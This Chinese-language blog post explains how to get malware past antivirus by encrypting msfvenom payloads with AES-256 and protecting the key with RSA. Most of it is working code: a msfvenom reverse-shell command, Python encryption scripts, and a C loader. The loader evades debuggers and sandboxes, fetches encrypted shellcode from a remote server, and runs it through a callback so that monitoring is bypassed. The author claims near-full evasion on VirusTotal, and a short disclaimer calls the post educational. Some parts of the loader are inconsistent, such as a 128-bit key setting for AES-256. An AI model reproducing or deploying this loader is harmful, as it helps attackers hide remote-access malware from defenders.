基于AES和RSA的加密免杀效果研究
先叠个甲:
本文仅作学习正规网络安全技术,所有效果均在自己靶机内操作,请勿将技术用于非法用途,使用者造成的一切后果,均与本文无关!
一、现状与猜想:
随着杀软的不断进化,payloads很容易被查杀,即使编码过后也不太行。
主流解决方法包括:
加壳;修改特征码;进程镂空...
现代密码学介绍:
1.对称密码:AES,DES3,XOR...
优点:可以对大信息加密,可以很大程度上消除明文特征;
缺点:密钥的安全保存难以保证;
2.非对称密码:RSA,ElGamal...
优点:分为私钥和公钥,保证密钥安全;
缺点:大素数的生成,即不能加密较大信息;
大胆猜想:混合加密免杀系统
非对称加密对称密钥,对称加密payloads
PS:我猜想到这里就搜了一下可行性,发现确实可以,就选AES-256和RSA进行测试,payloads来自msfvenom生成
密钥安全保存的实现:
加载器:
1.加密后的payloads
2.AES解密算法
服务器:
1.payloads源文件
2.RSA加解密算法及公私钥
3.AES密钥
交互流程:
1.客户端请求AES密钥
2.服务器接收响应,解密AES密钥,发送给客户端
3.客户端用AES密钥解密
4.加载器实现更多功能
二、实现流程:
1.使用msf生成payloads(这里是.exe的windows可执行文件)
msfvenom -p windows/shell_reverse_tcp lhost=127.0.0.1 lport=3333 -f exe -o payload.exe
2.用网页在线工具对payloads文件转化成16进制
!!注意:payload一定不要在主机上执行,不小心执行后一定要用杀软清理干净
转化的16进制数就是我们的目标明文
3.生成随机的可加密256位的大素数
点击查看代码
from Crypto.Util import number
def generate_keys():
"""生成支持256字节加密的RSA密钥对"""
# 生成2048位模数n(可加密256字节)
p = number.getPrime(1024)
q = number.getPrime(1024)
n = p * q
phi = (p - 1) * (q - 1)
e = 65537 # 常用公钥指数
d = pow(e, -1, phi)
return ((e, n), (d, n))
5.AES加密2中转化的16进制内容
点击查看代码
import os
# ====================== AES核心算法实现 ======================
AES_BLOCK_SIZE = 16
ROUNDS = 14 # AES-256轮数
# S盒(标准AES替换表)
SBOX = [
0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16
]
# 轮常数
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
def gmul(a, b):
"""有限域GF(2^8)乘法"""
p = 0
for _ in range(8):
if b & 1:
p ^= a
hi_bit = a & 0x80
a = (a << 1) & 0xFF
if hi_bit:
a ^= 0x1B
b >>= 1
return p
def sub_bytes(state):
"""字节替换"""
return [SBOX[b] for b in state]
def shift_rows(state):
"""行移位"""
return [
state[0], state[5], state[10], state[15],
state[4], state[9], state[14], state[3],
state[8], state[13], state[2], state[7],
state[12], state[1], state[6], state[11]
]
def mix_columns(state):
"""列混合"""
new_state = [0] * 16
for i in range(4):
s0 = state[i]
s1 = state[i + 4]
s2 = state[i + 8]
s3 = state[i + 12]
new_state[i] = gmul(0x02, s0) ^ gmul(0x03, s1) ^ s2 ^ s3
new_state[i + 4] = s0 ^ gmul(0x02, s1) ^ gmul(0x03, s2) ^ s3
new_state[i + 8] = s0 ^ s1 ^ gmul(0x02, s2) ^ gmul(0x03, s3)
new_state[i + 12] = gmul(0x03, s0) ^ s1 ^ s2 ^ gmul(0x02, s3)
return new_state
def add_round_key(state, round_key):
"""轮密钥加"""
return [s ^ k for s, k in zip(state, round_key)]
def key_expansion(key):
"""AES-256密钥扩展"""
# 初始密钥拷贝
w = list(key)
# 密钥扩展主循环
for i in range(8, 60):
temp = w[(i - 1) * 4:i * 4]
if i % 8 == 0:
# RotWord + SubWord + Rcon
temp = temp[1:] + [temp[0]]
temp = [SBOX[b] for b in temp]
temp[0] ^= RCON[i // 8 - 1]
elif i % 8 == 4:
# SubWord
temp = [SBOX[b] for b in temp]
w += [a ^ b for a, b in zip(w[(i - 8) * 4:(i - 7) * 4], temp)]
# 分组轮密钥
round_keys = []
for i in range(ROUNDS + 1):
round_keys.append(bytes(w[i * 16:(i + 1) * 16]))
return round_keys
def aes_encrypt_block(block, round_keys):
"""AES加密单个16字节块"""
state = list(block)
# 初始轮密钥加
state = add_round_key(state, round_keys[0])
# 主轮次
for round in range(1, ROUNDS):
state = sub_bytes(state)
state = shift_rows(state)
state = mix_columns(state)
state = add_round_key(state, round_keys[round])
# 最终轮
state = sub_bytes(state)
state = shift_rows(state)
state = add_round_key(state, round_keys[ROUNDS])
return bytes(state)
# ====================== 文件操作函数 ======================
def pkcs7_pad(data):
"""PKCS#7填充"""
pad_len = AES_BLOCK_SIZE - (len(data) % AES_BLOCK_SIZE)
return data + bytes([pad_len] * pad_len)
def xor_bytes(a, b):
"""字节异或操作"""
return bytes(x ^ y for x, y in zip(a, b))
def bytes_to_hex(data):
"""二进制转16进制字符串"""
return data.hex()
# ====================== 加密模块 ======================
def encrypt_file(input_file, output_file, key):
"""加密文件并保存为16进制格式"""
# 生成随机IV
iv = os.urandom(AES_BLOCK_SIZE)
# 密钥扩展
round_keys = key_expansion(key)
# 读取明文
with open(input_file, 'rb') as f:
plaintext = f.read()
# 填充明文
padded_plaintext = pkcs7_pad(plaintext)
# CBC模式加密
ciphertext = b''
prev_block = iv
for i in range(0, len(padded_plaintext), AES_BLOCK_SIZE):
block = padded_plaintext[i:i + AES_BLOCK_SIZE]
xored = xor_bytes(block, prev_block)
encrypted_block = aes_encrypt_block(xored, round_keys)
ciphertext += encrypted_block
prev_block = encrypted_block
# 合并IV和密文,转换为16进制
encrypted_data = iv + ciphertext
hex_data = bytes_to_hex(encrypted_data)
# 写入16进制文件
with open(output_file, 'w') as f:
f.write(hex_data)
# ====================== 主程序 ======================
if __name__ == "__main__":
# 从send.txt读取32字节密钥
with open('send.txt', 'rb') as f:
key = f.read(32)
if len(key) != 32:
raise ValueError("密钥必须是32字节(256位)")
# 加密模块
encrypt_file('aes-in.txt', 'aes-out.txt', key)
print("加密完成! 16进制结果保存在aes-out.txt")
6.RSA加密4中的AES-256密钥
点击查看代码
import random
from Crypto.Util import number
BLOCK_SIZE = 256 # 字节块大小
def generate_keys():
"""生成支持256字节加密的RSA密钥对"""
# 生成2048位模数n(可加密256字节)
p = number.getPrime(1024)
q = number.getPrime(1024)
n = p * q
phi = (p - 1) * (q - 1)
e = 65537 # 常用公钥指数
d = pow(e, -1, phi)
return ((e, n), (d, n))
def encrypt_long_string(public_key, plaintext):
"""加密长字符串(分块处理)"""
e, n = public_key
plain_bytes = plaintext.encode('utf-8')
# 检查长度
if len(plain_bytes) > BLOCK_SIZE:
raise ValueError(f"明文长度不能超过{BLOCK_SIZE}字节")
# 填充到固定长度(PKCS#1 v1.5填充)
padding_length = BLOCK_SIZE - len(plain_bytes) - 3
padding = bytes([random.randint(1, 255) for _ in range(padding_length)])
padded = b'\x00\x02' + padding + b'\x00' + plain_bytes
# 转换为整数并加密
plain_int = int.from_bytes(padded, 'big')
cipher_int = pow(plain_int, e, n)
return hex(cipher_int)
def main():
try:
# 读取待加密文件
with open('key-file.txt', 'r', encoding='utf-8') as f:
content = f.read().strip()
if not content:
raise ValueError("key-file.txt内容为空")
# 生成并保存密钥
public_key, private_key = generate_keys()
with open('public.txt', 'w') as f:
f.write(f"{public_key[0]},{public_key[1]}")
with open('private.txt', 'w') as f:
f.write(f"{private_key[0]},{private_key[1]}")
# 加密并保存结果
encrypted = encrypt_long_string(public_key, content)
with open('enkey-file.txt', 'w') as f:
f.write(encrypted)
print("加密成功!")
except FileNotFoundError:
print("错误:需要先创建key-file.txt")
except ValueError as ve:
print(f"加密错误:{str(ve)}")
except Exception as e:
print(f"系统错误:{str(e)}")
if __name__ == "__main__":
main()
7.使用virustotal测试
可以做到基本免杀
Ps:主播最烂的就是代码编程,问的deepseek老师,服务端的加解密用得python,加载器用的c
8.加载器代码
点击查看代码
#include <winsock2.h>
#include <windows.h>
#include <openssl/aes.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "libcrypto.lib")
// ========================
// 核心功能实现
// ========================
/* 环境检测模块 (反调试/沙箱检测) */
int environment_check() {
if (IsDebuggerPresent()) return 0;
// 硬件资源检测(虚拟机通常内存<2GB)
MEMORYSTATUSEX mem;
mem.dwLength = sizeof(mem);
GlobalMemoryStatusEx(&mem);
return (mem.ullTotalPhys > 2 * 1024 * 1024 * 1024) ? 1 : 0;
}
/* 网络通信模块 */
SOCKET connect_server(const char* ip, int port) {
WSADATA wsa;
SOCKET sock;
struct sockaddr_in server;
WSAStartup(MAKEWORD(2,2), &wsa);
sock = socket(AF_INET, SOCK_STREAM, 0);
server.sin_addr.s_addr = inet_addr(ip);
server.sin_family = AF_INET;
server.sin_port = htons(port);
return (connect(sock, (struct sockaddr*)&server, sizeof(server)) == 0) ? sock : INVALID_SOCKET;
}
/* 接收十六进制数据并转换 */
unsigned char* recv_hex(SOCKET sock, int* out_len) {
char hex_buf[4096];
int len = recv(sock, hex_buf, sizeof(hex_buf), 0);
if (len <= 0) return NULL;
*out_len = len / 2;
unsigned char* bin = (unsigned char*)malloc(*out_len);
for (int i = 0; i < *out_len; i++) {
sscanf(hex_buf + (i*2), "%02hhx", &bin[i]);
}
return bin;
}
/* AES解密核心 */
unsigned char* aes_decrypt_data(unsigned char* enc_data, int enc_len,
unsigned char* key, int* dec_len)
{
AES_KEY aes_key;
AES_set_decrypt_key(key, 128, &aes_key);
unsigned char* decrypted = (unsigned char*)malloc(enc_len);
unsigned char iv[AES_BLOCK_SIZE] = {0};
AES_cbc_encrypt(enc_data, decrypted, enc_len, &aes_key, iv, AES_DECRYPT);
// 移除PKCS7填充
*dec_len = enc_len - decrypted[enc_len-1];
return decrypted;
}
/* 内存执行模块 */
void exec_shellcode(unsigned char* sc, int size) {
LPVOID mem = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(mem, sc, size);
// 使用回调触发执行(绕过线程监控)
EnumWindows((WNDENUMPROC)mem, 0);
}
// ========================
// 主控流程
// ========================
int main() {
if (!environment_check()) return 0;
// 配置参数
const char* SERVER_IP = "192.168.1.100";
const int PORT = 443;
unsigned char enc_aes_key[] = {/* RSA加密后的AES密钥 */};
// 连接服务器
SOCKET sock = connect_server(SERVER_IP, PORT);
if (sock == INVALID_SOCKET) return 0;
// 1. 发送加密密钥并获取明文AES密钥
send(sock, (char*)enc_aes_key, sizeof(enc_aes_key), 0);
int key_len;
unsigned char* aes_key = recv_hex(sock, &key_len);
// 2. 获取加密的shellcode
unsigned char enc_shellcode[4096];
int sc_len = recv(sock, (char*)enc_shellcode, sizeof(enc_shellcode), 0);
closesocket(sock);
// 3. AES解密
int dec_len;
unsigned char* shellcode = aes_decrypt_data(enc_shellcode, sc_len, aes_key, &dec_len);
// 4. 敏感数据清理
SecureZeroMemory(aes_key, key_len);
free(aes_key);
// 5. 执行shellcode
exec_shellcode(shellcode, dec_len);
free(shellcode);
return 0;
}
浙公网安备 33010602011771号